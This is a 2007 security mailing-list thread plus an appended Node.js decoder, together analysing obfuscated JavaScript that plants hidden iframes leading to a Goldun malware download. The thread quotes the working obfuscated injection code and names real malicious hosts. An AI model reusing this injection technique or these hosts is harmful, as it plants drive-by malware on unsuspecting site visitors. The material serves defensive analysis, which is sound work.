[Dshield] Need help decoding hackers javascript code

Security security at hudakville.com
Thu Sep 6 17:52:05 GMT 2007


In this particular case, the end goal of the zlo-x.net/XDS/iframe.php
is to download and install a piece of malware from
hxxp://oya.ru/vyhod/numizmat/ima/get.php?file=exe.  The file that gets
downloaded, update.exe, is UPX-packed and is known to most AV as
Goldun.  The following link should let you see the VT results:

http://www.virustotal.com/resultado.html?e308317d18761b82d81c41c1f7902d53

Of course, along the way it branches out into other sites which try to
download and install their own goodies.

Tyler

Dave Hatz wrote:
> For those of us out here who are not as security savvy as some of the
> experts on this list, what is the hacker trying to accomplish with this
> page?
> 
> Dave Hatz 
> 
> -----Original Message-----
> From: list-bounces at lists.dshield.org [mailto:list-bounces at lists.dshield.org]
> On Behalf Of Chris Wright
> Sent: Tuesday, September 04, 2007 1:24 PM
> To: 'General DShield Discussion List'
> Subject: Re: [Dshield] Need help decoding hackers javascript code
> 
> 
> And just to save everyone else from having to decode it:
> 
> First block is:
> 
> <iframe width=1 height=1 border=0 frameborder=0
> src='hXXp://bensax.info/index2.html'></iframe> 
> 
>> <meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
>> <!--
>> function Decode(){var temp="",i,c=0,out="";var
>> str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32
>> !104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48
>> !32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114
>> !99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!10
>> 5!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!
>> 62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(
> c<=str.length-1){while(str.charAt(c)!='!')>
> temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp
>> );temp="";}document.write(out);}
> 
> Second block is:
> 
> <iframe src="hXXp://zlo-x.net/XDS/iframe.php" width=0 height=0
> border=0></iframe>
> 
> 
>> </SCRIPT>
>> <meta name="revisit-after" content="1 days" /><script
>> type="text/javascript">document.write('\u003c\u0069\u0066\u007
>> 2\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\
>> u0074\u0074\u0070\u003a\u002f\u002f\u007a\u006c\u006f\u002d\u0
>> 078\u002e\u006e\u0065\u0074\u002f\u0058\u0044\u0053\u002f\u006
>> 9\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\
>> u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0
>> 065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0062\u006f\u007
>> 2\u0064\u0065\u0072\u003d\u0030\u003e\u003c\u002f\u0069\u0066\
>> u0072\u0061\u006d\u0065\u003e')</script>
>>
> 
> _________________________________________
> SANSFIRE 2007 July 25-August 2 in Washington, DC.  56 courses, SANS top
> instructors, and a great tools and solutions expo. Register today!
> http://www.sans.org/info/4651 (brochure code ISC)
> 
> _________________________________________
> SANSFIRE 2007 July 25-August 2 in Washington, DC.  56 courses, SANS top
> instructors, and a great tools and solutions expo. Register today!
> http://www.sans.org/info/4651 (brochure code ISC)
> 
> 
> 
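The two decoding steps Chris Wright quotes above (a '!'-delimited list of decimal char codes fed to String.fromCharCode, and a document.write of a \uXXXX-escaped literal) can be undone statically, without letting the page's script run. The Node.js script below is an added example, not code from this thread or from any of the sites it mentions: it pulls both kinds of literal out of raw page source, decodes them as plain data, and reports the iframe targets in defanged form. The page source it runs on is constructed here with placeholder hosts (first.example.invalid, second.example.invalid) in the same shape as the quoted page, and all function names are my own.

```javascript
// Added example (not from the thread): static decoder for the two obfuscation
// layers quoted above. Nothing here evaluates the attacker's script; the
// literals are parsed out of the page source and decoded as plain data.

// Layer 1: '!'-delimited decimal char codes, the scheme Decode() feeds to
// String.fromCharCode. Whitespace is ignored so mail-wrapped copies decode too.
function decodeBangCodes(str) {
  return str
    .replace(/\s+/g, '')
    .split('!')
    .filter((tok) => tok.length > 0)
    .map((tok) => {
      if (!/^\d+$/.test(tok)) throw new Error(`unexpected token: ${tok}`);
      return String.fromCharCode(Number(tok));
    })
    .join('');
}

// Layer 2: \uXXXX and \xXX escapes inside a string literal, the scheme behind
// the document.write('\u003c\u0069...') block. Unescaped characters pass through.
function decodeUnicodeEscapes(literal) {
  return literal.replace(/\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})/g, (_, u, x) =>
    String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// Find every quoted string made only of "<digits>!" groups (the var str="..." payload).
function findBangStrings(source) {
  const out = [];
  const re = /"((?:\s*\d+\s*!)+)\s*"/g;
  let m;
  while ((m = re.exec(source)) !== null) out.push(m[1]);
  return out;
}

// Find every document.write('...') / document.write("...") argument, still escaped.
function findDocumentWriteLiterals(source) {
  const out = [];
  const re = /document\.write\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  let m;
  while ((m = re.exec(source)) !== null) out.push(m[2]);
  return out;
}

// Pull iframe src values out of decoded HTML.
function extractIframeSources(html) {
  const out = [];
  const re = /<iframe\b[^>]*?\bsrc\s*=\s*(['"]?)([^'"\s>]+)\1/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[2]);
  return out;
}

// Defang a URL for reports: hxxp scheme and bracketed dots in the host only.
function defang(url) {
  return url.replace(/^https?:\/\/[^/]+/i, (hostPart) =>
    hostPart.replace(/^http/i, 'hxxp').replace(/\./g, '[.]'));
}

// Run both decoders over raw page source and return what each layer hides.
function analyze(source) {
  const decoded = [
    ...findBangStrings(source).map(decodeBangCodes),
    ...findDocumentWriteLiterals(source).map(decodeUnicodeEscapes),
  ];
  const targets = decoded.flatMap(extractIframeSources).map(defang);
  return { decoded, targets };
}

// Encoder used only to build the constructed sample below (mirrors Decode()'s input format).
function encodeBangCodes(text) {
  return Array.from(text, (ch) => `${ch.charCodeAt(0)}!`).join('');
}

// Constructed sample page with placeholder hosts; same shape as the one in the thread.
const SAMPLE_PAGE = String.raw`<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="${encodeBangCodes(
  "<iframe width=1 height=1 border=0 src='http://first.example.invalid/index2.html'></iframe>\r\n"
)}";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
Decode();
//-->
</SCRIPT>
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020src="http://second.example.invalid/iframe.php" width=0 height=0></iframe>')</script>`;

// Stand-alone run: print what each layer decodes to and the defanged targets.
const demo = analyze(SAMPLE_PAGE);
for (const html of demo.decoded) console.log('decoded:', JSON.stringify(html));
for (const t of demo.targets) console.log('iframe target:', t);
```

Because the decoders never evaluate the script, the same functions can be pointed at a saved copy of a suspicious page (or at a mail-wrapped quote like the one above, since whitespace inside the char-code list is ignored) to get the hidden iframe destinations for blocking and logging without ever fetching them.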

